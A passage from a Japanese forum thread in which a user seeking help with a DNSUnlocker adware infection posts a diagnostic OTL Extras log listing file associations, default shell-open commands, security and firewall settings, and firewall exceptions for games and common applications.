OTLスキャンログを見せていただきましたが、OTL.txtはいいですがもうひとつのExtra.txtログは出ませんでしたか?
このログも一応検索して、見つかればその内容を追加レスください。

探しても見つからないならそのことだけレスくれればいいです
  • 悪代官
  • 2015/09/15 (Tue) 20:36:40
返信フォームへ 
Re: DNSunlockerの感染
こんばんは。

>今夜はIVNOさんがご多忙みたいなので自分がレスしましょう。
引き続きよろしくお願いします。

重ね重ね申し訳ありません、12日に行ったスキャンではExtraログは出力されていたのですがすっかり貼るのを忘れていました。

昨日行ったスキャンではファイル検索をしても出てこなかったので昨日の分のExtraログはないとは思われます。

以下、Extraログになります。


OTL Extras logfile created on: 2015/09/12 16:51:59 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\【ユーザー名】\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000411 | Country: 日本 | Language: JPN | Date Format: yyyy/MM/dd

3.84 Gb Total Physical Memory | 2.76 Gb Available Physical Memory | 71.85% Memory free
7.68 Gb Paging File | 6.02 Gb Available in Paging File | 78.39% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 447.66 Gb Total Space | 112.59 Gb Free Space | 25.15% Space Free | Partition Type: NTFS

Computer Name: 【ユーザー名】 | User Name: 【ユーザー名】 | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

[color=#E56717]========== Extra Registry (SafeList) ==========[/color]


[color=#E56717]========== File Associations ==========[/color]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.url[@ = InternetShortcut] -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\SysWow64\control.exe (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Classes\<extension>]
.html [@ = ChromeHTML] -- Reg Error: Key error. File not found

[color=#E56717]========== Shell Spawning ==========[/color]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [print] -- rundll32.exe %windir%\system32\mshtml.dll,PrintHTML "%1"
http [open] -- Reg Error: Key error.
https [open] -- Reg Error: Key error.
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Directory [AddToPlaylistVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" (VideoLAN)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [FindArchive] -- C:\Program Files\Explzh\Explzh.exe /f %1 (pon software)
Directory [PlayWithVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" (VideoLAN)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [print] -- rundll32.exe %windir%\system32\mshtml.dll,PrintHTML "%1"
http [open] -- Reg Error: Key error.
https [open] -- Reg Error: Key error.
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Directory [AddToPlaylistVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" (VideoLAN)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [FindArchive] -- C:\Program Files\Explzh\Explzh.exe /f %1 (pon software)
Directory [PlayWithVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" (VideoLAN)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

[color=#E56717]========== Security Center Settings ==========[/color]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = 28 4D B2 76 41 04 CA 01 [binary data]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]

[color=#E56717]========== Firewall Settings ==========[/color]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0

[color=#E56717]========== Authorized Applications List ==========[/color]


[color=#E56717]========== Vista Active Open Ports Exception List ==========[/color]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{07C7561D-2F98-4B2F-A818-6B5BF1470074}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{0F51752C-EE36-4433-9E6A-930D1E3E807F}" = lport=137 | protocol=17 | dir=in | app=system |
"{10A7FC14-49FB-48C2-9B54-187EB843EBBD}" = rport=139 | protocol=6 | dir=out | app=system |
"{12A60B3D-38AB-4B26-B6D7-BBA48B38234F}" = lport=1900 | protocol=17 | dir=in | name=windows live communications platform (ssdp) |
"{146FD676-76C0-46EF-9BA5-9BA1197D7FB5}" = lport=54045 | protocol=17 | dir=in | app=c:\program files\logicool gaming software\lcore.exe |
"{1BF9D083-497A-41AD-AF89-7E0E23457E0C}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{1C3459E1-CF46-4112-A65F-8FD5572775CF}" = lport=2177 | protocol=6 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{1F00F6DB-808D-48CC-B035-CD4F3EBFD1A4}" = lport=3702 | protocol=17 | dir=in | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{32EAAA51-6197-497D-8B2E-727F474D2830}" = rport=138 | protocol=17 | dir=out | app=system |
"{33E9EDED-CD1F-46EB-81BA-1D3087A99A4D}" = lport=2869 | protocol=6 | dir=in | app=system |
"{340DFD9C-4D9D-4B86-9C50-3C0E2FD14D0F}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{3B4FAD47-2B86-4B8D-BA22-221823059342}" = rport=3702 | protocol=17 | dir=out | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{3B987445-48E3-4BE8-BFFA-65C92C4BEFA5}" = lport=2869 | protocol=6 | dir=in | name=windows live communications platform (upnp) |
"{4926F38B-2BA5-4D73-A13D-36A282F3E377}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | name=@firewallapi.dll,-28539 |
"{54BE1F33-A751-41A8-AF78-A45A44A20A1B}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{5C6C3EED-262E-4748-BAB2-A06CD7484410}" = lport=5353 | protocol=17 | dir=in | app=c:\program files (x86)\google\chrome\application\chrome.exe |
"{5DCDF5B3-37C6-40FA-81BE-1387684598B1}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{620DA419-2143-4ED5-A47F-03D2ED91062A}" = rport=2177 | protocol=17 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{7B9F4087-4270-406B-8988-3533D271781A}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{7EDE44CE-6267-4D4A-8FA3-D84006221026}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe |
"{84FA516B-C8B6-4E58-8E01-D7AAFA024571}" = lport=10243 | protocol=6 | dir=in | app=system |
"{8C14F673-CCB4-4D17-AF33-A12E05A7CA32}" = lport=3702 | protocol=17 | dir=in | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
"{8E857F88-07D3-4346-AC52-58C7E42178A1}" = lport=138 | protocol=17 | dir=in | app=system |
"{92E0D575-E5F5-4147-BDB6-70A4607CF8E1}" = rport=2177 | protocol=6 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{940E5143-47AB-4273-BADE-5F826816312B}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{A68DC19E-3B4A-4157-8FB7-EB2D7DD668A8}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{B6D392CD-E978-4A17-9367-AE242536921C}" = rport=137 | protocol=17 | dir=out | app=system |
"{B97C6C74-1CDD-41B8-A642-57ACC5394C1D}" = lport=139 | protocol=6 | dir=in | app=system |
"{B9C0DA78-35BA-464C-B4BE-21615091FBE0}" = lport=445 | protocol=6 | dir=in | app=system |
"{BEFE078D-4CA2-44FB-B48F-6C24D39D3C44}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{C969587D-3177-44BE-B3D2-016CD884344A}" = rport=3702 | protocol=17 | dir=out | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
"{DE99D120-72BC-4861-B01D-6D3734A1E734}" = lport=5353 | protocol=17 | dir=in | app=c:\users\【ユーザー名】\appdata\local\vivaldi\application\vivaldi.exe |
"{E31C6882-A62F-4ECB-85BD-CFB546EDDE0D}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{E4C0DABB-FAD2-40E2-A0E8-B7BAA9964A27}" = rport=445 | protocol=6 | dir=out | app=system |
"{E50D4D0F-DB86-469C-8A3F-ECB108058CE8}" = rport=10243 | protocol=6 | dir=out | app=system |
"{EC66A11C-D318-4164-B18B-DBB025C6C5CD}" = lport=2177 | protocol=17 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |

[color=#E56717]========== Vista Active Application Exception List ==========[/color]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{000CB540-A21D-4547-8D93-B871C48BE9C0}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\clear.fi media\dmcdaemon.exe |
"{0202719B-3613-496C-8978-C39571FC76CE}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\clear.fi photo\windowsupnp.exe |
"{0416A1F9-B971-43D4-A3C1-381D4EF16981}" = protocol=17 | dir=in | app=c:\program files (x86)\mozilla firefox\firefox.exe |
"{048A6865-A8D0-4636-B510-06C6924F6825}" = dir=in | app=c:\program files (x86)\janetter2\bin\janettersrv.exe |
"{0609FAA2-FB33-4EA7-B2BB-5160F72D305A}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |
"{09072A48-31BA-4112-8252-2C4C39B21F97}" = dir=in | app=c:\program files (x86)\windows live\mesh\moe.exe |
"{0AC0E324-F097-4618-80A6-B13DA2C36746}" = protocol=17 | dir=in | app=c:\program files\bitcomet\bitcomet.exe |
"{0BB34C3B-0980-4D3A-B76F-F316D3C3E715}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\left 4 dead 2\left4dead2.exe |
"{0BFEFFAD-6F4A-4807-9C39-A2668332A151}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |
"{0C4C931E-86FD-4D3F-B4A1-22EFCDBB5F99}" = protocol=6 | dir=in | app=c:\program files (x86)\origin games\peggle deluxe\peggle.exe |
"{17EC8CAA-28F1-46FF-ACF7-CF8517D1666B}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\portal 2\portal2.exe |
"{19986BB5-D8F7-46AD-8DAF-7402D3294655}" = protocol=6 | dir=in | app=c:\program files (x86)\origin games\plants vs. zombies\plantsvszombies.exe |
"{1E168288-A312-45C9-A45C-68E71183FA85}" = protocol=6 | dir=in | app=c:\program files\common files\mcafee\platform\mcsvchost\mcsvhost.exe |
"{20ED1154-74E2-40CC-B7BA-EB97A5629618}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\starbound - unstable\win32\launcher\launcher.exe |
"{249E4784-37ED-41B7-9A0A-A7A1DB45CE77}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |
"{28FE3C24-72B9-46EA-BFF8-DF1F5ED3A735}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\bin\steamwebhelper.exe |
"{2B458094-E34E-4D61-A71E-00BF0AE09CC1}" = protocol=6 | dir=in | app=c:\program files\bitcomet\bitcomet.exe |
"{2F7EA497-8A77-4E93-98FD-FAC3D04148EB}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\fallout 3 goty\falloutlauncher.exe |
"{31519014-0E92-44F8-AA64-C071294ECE6C}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\starbound - unstable\win32\launcher\launcher.exe |
"{32F33D92-B564-45C8-9DBE-7C8415836E1E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{3C94EE72-023D-4737-A164-BBF75A47C58F}" = protocol=17 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{3D407C13-6E56-4E73-BA26-F75998103B57}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\clear.fi media\dmcdaemon.exe |
"{3F028649-AFB9-4646-A588-ECE4CDBAFA42}" = protocol=17 | dir=in | app=c:\program files (x86)\origin games\peggle deluxe\peggle.exe |
"{4058E48D-159B-43FF-888A-21A974202DA7}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |
"{4212E55C-1F49-42D2-95E0-66D64EAE9533}" = protocol=58 | dir=in | name=@firewallapi.dll,-28545 |
"{4894A956-5C80-4DFE-8B64-CBE309B92B35}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{4DA813BA-4CFF-4628-9830-67F5E10C1C54}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\clear.fi media\windowsupnpmv.exe |
"{4F07AEE6-9B16-49F9-ADF8-0D71668C1761}" = dir=in | app=c:\program files (x86)\windows live\contacts\wlcomm.exe |
"{57805F11-9512-4DAB-A81B-9BE6AACEFB36}" = dir=in | app=c:\program files\nec\atermwrex\wrstexv.exe |
"{57C2D820-7AD0-453B-8285-8E58CDE25BFA}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{58C3630E-2864-42D8-9CA7-759BE2CA0CC8}" = protocol=17 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |
"{5C7A5130-BB4B-4231-A9BB-3590E1B0B946}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{5CE10B12-55C2-4B77-B394-7D8EC65CB312}" = protocol=6 | dir=in | app=c:\windows\syswow64\pnkbstrb.exe |
"{5EF58D62-07CF-43DC-B2F9-83C8FB06F8FD}" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\appdata\roaming\dropbox\bin\dropbox.exe |
"{5F734B32-22E0-447D-AC75-C2E648200B4D}" = protocol=17 | dir=in | app=c:\programdata\nexonjp\ngm\ngm.exe |
"{613F8DC5-EB12-4E91-A5E4-87CF3526A7BA}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\the walking dead season two\thewalkingdead2.exe |
"{64A04FF8-CBFD-4731-ADD8-CA6C933B48CF}" = protocol=6 | dir=in | app=c:\program files (x86)\mozilla firefox\firefox.exe |
"{66FBD273-42FE-40DA-B13D-1A20274091C3}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |
"{699E3024-C238-41CC-827A-4FC9C961A707}" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\kaihoukun.exe |
"{702F3FF7-72F5-435C-BE21-FC5392564B35}" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\appdata\roaming\dropbox\bin\dropbox.exe |
"{706D024A-9987-43A7-99AB-A05AAC753B50}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\bin\steamwebhelper.exe |
"{7859C098-852C-48C0-BE23-F43D5839153E}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\borderlands 2\binaries\win32\borderlands2.exe |
"{7BA1DE26-D030-427C-A352-2952D5607E9B}" = protocol=17 | dir=in | app=c:\windows\syswow64\pnkbstra.exe |
"{80BD62F0-062A-454E-BF77-3E33199DC286}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\the walking dead season two\thewalkingdead2.exe |
"{84353309-3AD0-4710-A037-30439DFDCE60}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |
"{89AA67F2-634A-4DC7-B707-43A456CF4EDB}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steam.exe |
"{8D385D53-B418-4821-8628-F4A7EA23FD5D}" = protocol=6 | dir=in | app=c:\windows\syswow64\pnkbstra.exe |
"{8FB24DD1-C855-473B-848C-7BA7883EAB0B}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{919026AB-819B-4B75-9888-5C4DC4CC7B61}" = dir=in | app=c:\program files (x86)\google\chrome remote desktop\45.0.2454.17\remoting_host.exe |
"{ACD8571A-BF2F-4058-A9F1-13943D59DDB1}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\terraria\terraria.exe |
"{AE7613E1-4C01-4039-B13B-86BFF0A9C276}" = dir=in | app=c:\program files (x86)\itunes\itunes.exe |
"{B116E981-05C0-4A0E-82B8-6D0DDDA1288A}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\clear.fi photo\windowsupnp.exe |
"{B4D2790B-E562-45A0-BE60-91C93F6B35D9}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{B8306C92-4748-41D2-AB0C-262657062264}" = protocol=6 | dir=in | app=c:\programdata\nexonjp\ngm\ngm.exe |
"{BC8CE69F-0BAF-424D-BB8D-4FDEFD3A868B}" = protocol=6 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |
"{C2476E67-6AC5-4E77-95A1-FD2ADA0179D1}" = protocol=6 | dir=in | app=c:\program files\logicool gaming software\lcore.exe |
"{C30F7B29-0F51-4EC9-BFA9-37019321A040}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\clear.fi photo\dmcdaemon.exe |
"{C4CEFC82-C662-4525-AF12-FAB2BB6F9228}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\borderlands 2\binaries\win32\borderlands2.exe |
"{C7059020-81C9-4E74-AEF0-8E9EDF4E9806}" = protocol=17 | dir=in | app=c:\program files (x86)\origin games\plants vs. zombies\plantsvszombies.exe |
"{C85F098F-9402-4F66-875C-0CA5B076D538}" = protocol=1 | dir=in | name=@firewallapi.dll,-28543 |
"{CC61CB80-59BA-4542-85A1-B3EB12CFF1CB}" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\kaihoukun.exe |
"{CCD5F8D3-8A12-4A59-B88B-6686E01A1778}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\clear.fi photo\dmcdaemon.exe |
"{CDAA9BEA-00EE-4C1E-BA26-FAEABE1DB2C1}" = protocol=17 | dir=in | app=c:\windows\syswow64\pnkbstrb.exe |
"{CF3AD123-298F-4886-BB82-F3E2013A1C72}" = protocol=6 | dir=out | app=system |
"{D03B648A-B646-4005-9A7D-E2E7FF4306C1}" = dir=in | app=c:\program files (x86)\windows live\messenger\msnmsgr.exe |
"{D0CB7808-C14F-49C3-B913-F57BBFE97E5C}" = protocol=6 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |
"{D7AAB717-BF01-402E-BE6D-C2DF2B4DBD95}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\borderlands 2\binaries\win32\launcher.exe |
"{D98D8193-F51D-407C-9A96-BECC74FCD7A0}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\fallout 3 goty\falloutlauncher.exe |
"{DA63143F-C1C6-4F41-ADDC-472CE1DAE4B5}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\borderlands 2\binaries\win32\launcher.exe |
"{DAC2F7B6-15E2-4F3F-9885-F258005816B3}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\the walking dead\walkingdead101.exe |
"{DB115161-C0C4-44D5-AE20-D7B41920CF83}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\clear.fi media\windowsupnpmv.exe |
"{DCE9B16C-52F0-4564-A3FF-13E3CA1588E7}" = dir=in | app=c:\program files (x86)\acer\clear.fi sdk20\movie\playmovie.exe |
"{DE42C99A-A557-4832-B6CB-ED94CE6293F0}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steam.exe |
"{E173D6D7-8DE6-41A8-9193-1D75C20A5165}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |
"{E5982946-BFB5-4FF1-9545-1BAE1F0DE885}" = protocol=6 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{E7AE6B6D-2758-40C4-A69A-3C34D4DDC784}" = protocol=58 | dir=out | name=@firewallapi.dll,-28546 |
"{E7C889B8-BD4C-406C-9593-BA6815008F3B}" = protocol=17 | dir=in | app=c:\program files\common files\mcafee\platform\mcsvchost\mcsvhost.exe |
"{ED4DB8BE-CC4C-4401-B231-C54AA1A6E79B}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\the walking dead\walkingdead101.exe |
"{F099F014-C084-4313-AD0C-99A89878448F}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{F2DAC660-E054-434C-9E37-F8811838E44F}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\portal 2\portal2.exe |
"{F6F3A866-3400-4460-9EA5-7387C64E41DA}" = protocol=1 | dir=out | name=@firewallapi.dll,-28544 |
"{F7B313DC-E69C-4926-B00E-090EF96DE908}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\terraria\terraria.exe |
"{FACDEF2E-95C9-4748-9C1B-A56847C1A7AA}" = protocol=17 | dir=in | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{FCF081A5-7057-4828-9DF7-DCF0532531C8}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\left 4 dead 2\left4dead2.exe |
"TCP Query User{03E0A93A-75D3-4D07-B56A-8D1D5621B62C}C:\users\【ユーザー名】\desktop\艦これ\提督業も忙しい\kancolleviewer.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\提督業も忙しい\kancolleviewer.exe |
"TCP Query User{15BF7285-D723-4137-A4DA-F3E8758A28D8}C:\users\【ユーザー名】\appdata\roaming\utorrent\utorrent.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\appdata\roaming\utorrent\utorrent.exe |
"TCP Query User{19ACD1EB-17EC-48EF-8568-3879412A8204}C:\users\【ユーザー名】\desktop\提督業も忙しい\kancolleviewer.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\提督業も忙しい\kancolleviewer.exe |
"TCP Query User{1AC5579A-F8C6-4BE4-A75C-50DFB51F9E86}C:\users\【ユーザー名】\desktop\kancolleviewer ver.2.4\kancolleviewer.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\kancolleviewer ver.2.4\kancolleviewer.exe |
"TCP Query User{2D50CDD8-DE87-4402-AFB0-475E91AEB8AD}C:\riot games\league of legends\rads\projects\lol_patcher\releases\0.0.0.14\deploy\lolpatcher.exe" = protocol=6 | dir=in | app=c:\riot games\league of legends\rads\projects\lol_patcher\releases\0.0.0.14\deploy\lolpatcher.exe |
"TCP Query User{30259703-476E-4A46-BE1F-93BE4F9C5493}C:\program files (x86)\steam\steamapps\common\terraria\terrariaserver.exe" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\terraria\terrariaserver.exe |
"TCP Query User{36344264-B27E-44BC-912E-06EDC90FBEC1}C:\program files\bitcomet\bitcomet.exe" = protocol=6 | dir=in | app=c:\program files\bitcomet\bitcomet.exe |
"TCP Query User{36758093-0557-4DB8-A097-21F6B1532EAC}C:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe" = protocol=6 | dir=in | app=c:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe |
"TCP Query User{56C87BDB-5E80-449B-8377-80374B9336AE}C:\users\【ユーザー名】\desktop\kancolleviewer ver.2.4\kancolleviewer.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\kancolleviewer ver.2.4\kancolleviewer.exe |
"TCP Query User{589569A2-B291-44B7-BD03-3787836292FA}C:\users\【ユーザー名】\desktop\艦これ\提督業も忙しい\kancolleviewer.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\提督業も忙しい\kancolleviewer.exe |
"TCP Query User{5CA9F08A-45F8-4751-A325-FD4209F8BCDF}C:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.6\kancolleviewer.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.6\kancolleviewer.exe |
"TCP Query User{6138985F-CA2A-4116-B628-C250BE08336E}C:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.4\kancolleviewer.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.4\kancolleviewer.exe |
"TCP Query User{629FB112-524A-460C-87E9-906B4CCE2909}C:\riot games\league of legends\rads\projects\lol_patcher\releases\0.0.0.14\deploy\lolpatcherux.exe" = protocol=6 | dir=in | app=c:\riot games\league of legends\rads\projects\lol_patcher\releases\0.0.0.14\deploy\lolpatcherux.exe |
"TCP Query User{67F51355-D537-4F23-91B2-1DCA58D912BB}C:\program files (x86)\java\jre7\bin\javaw.exe" = protocol=6 | dir=in | app=c:\program files (x86)\java\jre7\bin\javaw.exe |
"TCP Query User{762E3EAE-63AA-4D9E-A77F-99B7C301EA5D}C:\games\world_of_warships\wowslauncher.exe" = protocol=6 | dir=in | app=c:\games\world_of_warships\wowslauncher.exe |
"TCP Query User{7A27CC62-4ADC-4E95-8ED7-6B480B1315AE}C:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.4\kancolleviewer.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.4\kancolleviewer.exe |
"TCP Query User{876FA58A-9F10-4143-9C6B-BD83F81376A5}C:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.6\kancolleviewer.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.6\kancolleviewer.exe |
"TCP Query User{88416970-5870-4022-BD6A-B6DE1A78EBFE}C:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.2.6 beta\kancolleviewer.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.2.6 beta\kancolleviewer.exe |
